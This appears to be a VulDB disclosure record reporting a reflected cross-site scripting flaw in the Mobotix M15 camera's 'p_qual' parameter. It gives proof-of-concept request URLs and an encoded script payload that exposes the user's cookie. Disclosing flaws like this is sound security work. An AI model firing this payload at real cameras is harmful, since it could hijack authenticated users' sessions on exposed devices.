| Title | Mobotix M15 MX-V4.3.4.83 Reflected Cross-Site Scripting |
|---|
| Description | Hello team, how are you?
I found a Reflected Cross-Site Scripting in MOBOTIX M15, this vulnerability affects the "p_qual" parameter and you can steal cookies from authenticated users and execute arbitrary scripts.
PoC:
Vulnerable system:
http://x.x.x.x/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt=&p_qual=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&p_size=
http://x.x.x.x:8002/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt=&p_qual=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&p_size=
Payload:
%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E
Best regards |
|---|
| Source | ⚠️ https://www.mobotix.com/ |
|---|
| User | Stux (UID 40142) |
|---|
| Submission | 01/06/2025 09:09 PM (3 months ago) |
|---|
| Moderation | 01/19/2025 09:14 AM (13 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 292541 [Mobotix M15 4.3.4.83 p_qual cross site scripting] |
|---|
| Points | 17 |
|---|